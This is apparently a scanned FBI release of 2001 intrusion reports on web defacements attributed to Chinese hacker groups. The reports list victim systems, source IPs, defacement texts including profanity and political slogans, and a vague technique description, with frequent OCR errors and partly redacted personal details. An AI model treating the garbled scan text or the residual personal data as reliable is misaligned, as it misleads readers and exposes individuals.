Question3_Date_Time=May 6 2001, Estimated time at 7:39 am 
Question4_Critical=No 

Question5_crit_infrasture=Other 


.Question5_Remarks=This is a research-based web site, which provides income to ATLA. 
. Question6_nature_of_prob=Web site defacement 


Question6_other= 

Question7_exp_problem=No 

Question7_Remarks=No Remarks 

Question8_method_of_attack=Other 

Question8_Remarks=Our web pages were replaced by "Honkers" web pages, identified as a Chinese 
group. 

Question9_sus_perpetrators=Other 

QuestionS_Remarks=Attacks by pro-Chinese group, sending their "political" message 
Question10_ip_addrs=Unknow at this time, but we might be able to find out with 
Question11_evid_of_spoof=Unknown 

Questioni2_oper_systems=NT 

Questioni2_Remarks=No Remarks 

Question13_security_infrasture=Encryption 

Question13_security_infrasture=Secure Remote Access/Authorization tools 
Question13_security_infrasture=Security Auditng Tools 
Question14_attack_loss_info=No 

Question14_Remarks=No Remarks 

Question15_damage_systms=Yes 


Question15_Remarks=Deleted existing pages from si ich had to be restored from backup tapes 
before site 
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Question16_what_actions=Other 

Question16_| ; Remarks=We had an FTP service running, which has been stopped, 
Question17_Field Office= 

Question17_fieldoff_inform=No 

Question18_agency_inform=No 

Question18_State_local Police= = 
Questioni8_Inspector General= 

Questioni8_CERT-CC= 

Question18 FedCiRC= 

Question18_JTF-CND= 

Question18_Other= 

Question19_date_of_last_update=recenily 

Question19_org_work_update= 

Question20_POC Information= 

Question20_sys_adm_contract=No 

Question21_remarks= “\WVe think access was made to the site via the ftp service. We have stopped the 
service, and will monitor the site. : 
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FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 06/11/2001 


To: Counterterrorism Attn: Computer Investigations 
Unit, Room 5965 National 
Infrastructure Protection 
Center (NIPC) 


From: St. Louis 


b3 
Approved By: ise 


b7c 
Drafted By: ; DIE 


Title: Subject: HONKER UNION OF CHINA 
Victim: Washington University Psycholo Department 


Type: Computer Intrusion (Web Defacement) 


Date: May 11, 2001 


SUBMISSION: X Initial 0 Supplemental O Closed 
CASE OPENED: _05/22/2001 


CASE CLOSED: _06/11/2001 (Referred to Chicago Division) 
C No action due to state/local prosecution 

(Name/Number: ) 

[1] USA declination 

Referred to Another Federal Agency 

(Name/Number: ) 

O Placed in unaddressed work 

x Closed administratively 

OM Conviction 


COORDINATION: FBI Field Office St. Louis Division 
Government Agency 
Private Corporation 


VICTIM 


Company name/Government agency: _Washington University Psychology Dept. 
Address/location: St. Louis, Missouri 

Purpose of SystenData_ Base support English Lexicon Lanquage (Nationwide 
Highest classification of information stored in system: N/A 


b3 


: b6 
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-To: mm re From: Washington FielD 
Re: Fe pares /XX/2000 . Pe 


System Data: 
Hardware/configuration (CPU): Dell Poweredge Intel platform 
Operating System: Windows 2000 
Software: Internet Information Services (IIS) 5.0 


Security Features: 
Security Software Installed: 01 yes (identify ) x no 


Logon Warning Banner: 0 yes x no 


INTRUSION INFORMATION 


Access for intrusion: x Internet connection 1 dial-up number O LAN (insider) 
If Internet: Internet address: 128 .252.27.210 


Network name: elexicon.wustl.edu 
Method: 
Technique(s) used in intrusion: GET command, (list 


provided) Echoing a string of HTML commands and redirecting output to a file. 


Path of intrusion: ; 
addresses: 1.210.52.149.171 2.200.199.223.150 3, 


country: 1. _ China 2._ Brazil 
facility: 1. 2. 3: 


W 


Subject: 
Age: Race: 
Sex:: Education: 
Alias(s): Motive: 
Group Affiliation: HONKER UNION OF CHINA 
Employer: 
Known Accomplices: 
Equipment used: 
Hardware/configuration (CPU): 
Operating System: 
Software: 


Impact: 
Compromise of classified information: O yes X no 
Estimated number of computers affected: 1 
Estimated dollar loss to date: 10-12 Man Hours. 


Y 


To: Counterterror 'From: Washington FiclgD 
Re:[ | Date: X&/XX/2000 


Category of Crime: 
Impairment: Theft of Information: 
x Malicious code inserted . O1 Classified information compromised 
O Denial of service O Unclassified information compromised 


O Destruction of information/software 0 Passwords obtained 
x Modification of information/software L Computer processing time obtained 
O Telephone services obtained 
QO Application software obtained 
C) Operating software obtained 
Intrusion: 
x Unauthorized access 
1 Exceeding authorized access 


REMARKS 


On May 11, 2001, a database server belonging to the 
Washington University, Psychology Department was attacked with a 
HTML code which caused a defacement. The attack removed the web 
page and replaced it with a text message; “Fuck USA Government, 
Fuck PoizonBOx, contact sysadmen@yahoo.com.cn”. 


SBC (Southwest 
shone number 


Bell Cellular) Inc., Date of Birth 

has been working as a with Washington 
University, Since created the Website and 
database a amu eee Department to use for nationwide 
research. received his graduate degree from Washington 
University in Computer Science. 


[| provided sa[____|with the system logs, via E-mail 
which provide a detail account of the attack. The logs show the 


GET command being used to try and access Port 80 on the victim 
server. 


traced the two source IP addresses and discovered 
that 210.52.149.171 originated from an organization in China and 
200.199.223.150 originated from an organization in Brazil. 
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(Rev. 08-28-2000) 


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 06/12/2001 


To: Counterterrorism Attn: I 
fiicaas 


From: Washington Field 
NS-18/NVRA 
Contact: 


SA 103-762-3456 


Approved By: 
Drafted By: 
Case ID #: 


Title: HACKER HONKER UNION OF CHINA; 
ILLINOIS SECRETARY OF STATE; 
04/03/2001; 

INTRUSION 


Synopsis: To provide Chicago (CG) with FD-801 reports 
pertaining to the captioned case. 


Reference: Email dated 5/2/01 from subject 
"Honkers Union of China consolidating Honkers 


Union of China leads out of the CG office. 


Enclosure(s): The following seven (7) FD-801 reports 
processed by Washington Field (WF) are enclosed for CG only: 


Details: In support of the ongoing investigation of the 
HONKER UNION OF CHINA, WF has processed seven FD-801 reports. 
CG case agent may review the FD-801 reports for any relevance 
to the CG case. 
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©... Field 


To: i : 
Re: 06/12/2001 


LEAD (s): 
Set Lead 1: (Adm) 
CHICAGO 
AT _ CHICAGO 


Read and clear. 
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FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/25/2001 


To: Counterterrorism Attn: Computer Investigations 
Unit, NIPC, Room 5965 


From: Washington Field Office / NVRA 


Squad NS-18 ; : 
Contact: SA (703) 762-3830 . a 
b7C 
Approved By: b7E 
Drafted By: 
Case ID #: (Pending) 
(Pending) 
Title: Subject: UNSUB (S) 
Victim: DESIGNERS AND PLANNERS, INC.; 
Type: ; INTRUSION - INFO SYSTEMS 


Date: 05/01/2001 


Reference:[ be 
SUBMISSION: 0 Initial O Supplemental X Closed 


CASE OPENED: 


CASE CLOSED: 


XO} No action due to state/local prosecution (Name/Number ) 
C1 USA declination 


O Referred to Another Federal Agency (Name/Number: ) 
X Placed in unaddressed work 

C) Closed administratively 

C) Conviction 


COORDINATION: FBI Field Office 
Government Agency 
Private Corporation 


To: Counterterrorism From: Washington Field Office / NVRA 
b7E 


VICTIM 


Company name/Government agency: DESIGNERS AND PLANNERS, INC., 
Address/location: 2120 Washington Boulevard, Suite 200 
Arlington, VA 22204 


Purpose of System: Company web page 
Highest classification of information stored in system: Unclassified 


System Data: 
Hardware/configuration (CPU): Dell Power edge 1400 
Operating System: _Windows NT -Service Pack 6A - with all patches and hotfixes 
Software: Stateful Inspection Firewall by Sonicwall 


Security Features: unknown at this time 
Security Software Installed: X yes O no 
Logon Warning Banner: QO] yes X no 


INTRUSION INFORMATION 


Access for intrusion: 1 Internet connection (1 dial-up number 1 LAN (insider) 
If Internet: Internet address: 
Network name: 
Method: 
Technique(s) used in intrusion: 
Path of intrusion: 


addresses: 1. 2: 3. 4. 2 

country: 1. os 3. 4. 5. 

facility: 1. 2. 2: 4. 2: 
Subject: 

Age: Race: 

Sex: Education: - 

Alias(s): Motive: 

Group Affiliation: 

Employer: 

Known Accomplices: 

Equipment used: 


Hardware/configuration (CPU): 
Operating System: 


@ @ 


To: Counterterrorism From: Washington Field Office / NVRA 
Re: 


Software: 
Impact: 
Compromise of classified information: O yes X no = 
Estimated number of computers affected: One 
Estimated dollar loss to date: 
Category of Crime: 
Impairment: Theft of Information: 
- Malicious code inserted QO) Classified information compromised 
QO Denial of service O Unclassified information compromised 
O Destruction of information/software O Passwords obtained 


O Modification of information/software 1 Computer processing time obtained 
[} Telephone services obtained 
O Application software obtained 
O) Operating software obtained 
Intrusion: : 
X Unauthorized access 
O) Exceeding authorized access 


REMARKS 


f Designers & Planners, Inc., a small 
Naval Architecture and Marine Engineering firm located at 2120 Washington Boulevard, Suite 200, 
Arlington, Virginia 22204, telephone number (703) 920-7070, extension] _ advised that the 
webpage for his company, www.dandp.com had been defaced in the late in the evening on April 30, 
2001, or in the early morning of May 1, 2001. [estimated damages to be approximately 
$950.00. [__Jadvised he was unable to determine the exploit used for accessing the web page and 
rebuilt the server to ensure no Trojans had been placed on his system. 


[advised that the index files <<hack.jpg>> and <<inde.html>> were substituted for the normal 
website pages] _ provided a screen capture of the defaced webpage in which a group claiming to 
be a Chinese Hacking group by the name of N.D GROUP claimed responsibility. N.D GROUP 
advised that they are the action group of MUDFROG TECHNOLOGY. Hackers by the name of 

ee responsibility for the defacement. A copy of the screen capture is 
attached for reference purposes. 
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. Page 2 of 3 


This Site is Hacked by Chinese Hacker 
Group N.DB Group 


1.China is no longer a Country like Yugoslavia , we have 
the best army , navy, air forces & nuclear weapons , 
Don't do anything stupid to interfernce China's interior , 
and split Taiwan from China. There is Only A China in 
the world, that is People Republic of Chinal!! 


2.Do apologize to china for the air collision incident,and 
bear all the responsibility. 


_ NLD Group is the action Group of Mudfrog Technology 
HACKED BY DCBOY AND NIKING 


05/02/2001 


es 
> . 
ay . 


FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/29/2001 
To: Counterterrorism Attn: NIPC- 
SSA b3 
b6 
From: Washington Field Bie 
NS-18/NVRA Bie 


Contact: SA (703) 762-3155 


Approved By: 


Drafted By: 


Case ID #: 

Title: Subject: UNSUB (S) ; 
Victim: UNITED STATES DEPARTMENT OF LABOR; 
Type: INTRUSION - GOVERNMENT SERVICES 
Date: 04/28/2001 


bTE 


SUBMISSION: O Initial O Supplemental X Closed 
CASE OPENED: 


CASE CLOSED: 


Ci No action due to state/local prosecution (Name/Number ) 
C1] USA declination 


CI} Referred to Another Federal Agency (Name/Number: ) 


X Placed in unaddressed work 
C1 Closed administratively 
(1 Conviction 


COORDINATION: FBI Field Office 
Government Agency 
Private Corporation 


VICTIM 


Company name/Government agency: UNITED STATES DEPARTMENT OF LABOR 
Address/location: 200 CONSTITUTION AVENUE 


Purpose of System: Web Server Pie 


Highest classification of information stored in system: None 


To: i rom: Washington Field 
Re: , 05/29/2001 see 


System Data: 


Hardware/configuration (CPU): Intel Pentium IT 
Operating System: Windows NT 4.0 
Software: Microsoft IIS v5 


Security Features: 
Security Software Installed: X yes O no 
Logon Warning Banner: LI yes X no 


INTRUSION INFORMATION 
Access for intrusion: X Internet connection O dial-up number 11 LAN (sider) 


Internet address: 63.106.133.245 
Network name: 


Method: 
Technique(s) used in intrusion: 
Path of intrusion: 
addresses: 1. 2: 3. 4. 5. 
country: 1. 2; 3. 4. D: 
facility: 1. Ze 3. 4, 5. 
Subject: 
Age: Race: 
Sex: Education: 
Alias(s): Motive: 
Group Affiliation: 
Employer: 
Known Accomplices: 
Equipment used: 
Hardware/configuration (CPU): 
Operating System: 
Software: 
Impact: 


Compromise of classified information: 0 yes X no 
Estimated number of computers affected: 1 
Estimated dollar loss to date: Insignificant 


Oe 3c rom: Washington Field 
Re: , 05/29/2001 : . 


Category of Crime: 
Impairment: Theft of Information: 7 
O Malicious code inserted QO Classified information compromised 
[1 Denial of service C] Unclassified information compromised 
QO Destruction of information/software C Passwords obtained 


O Modification of information/software [1 Computer processing time obtained 
: QO Telephone services obtained 
OC -Application software obtained 
C1 Operating software obtained 
Intrusion: 
X Unauthorized access 
C] Exceeding authorized access 


REMARKS 


From May 25, 2001 through May 29, 2001, sa[ b6 


[———Joontacteah ——*d nite States © 
Department of Labor, 200 Constitution Avenue, 
Washington, D.C. 20210, work telephone number, 


regarding to the compromise of their web server. 


On April 28, 2001, the www.dol.qov web page had been 


defaced. 
b7E 
The web page was restored from backup and there we no 
mission impact or loss of critical services. The cost associated 
with the restoration of the aforementioned web site was 
considered insignificant. 
b7E 


For reference purposes, one (1) copy of the FD-71 filed 
with the FBI New Haven Field Office and one (1) copy of an email 
sent to saL from ave been attached to b6 
this document. bic 


++ 


Coun ism From: Washington Field 
, 05/29/2001 
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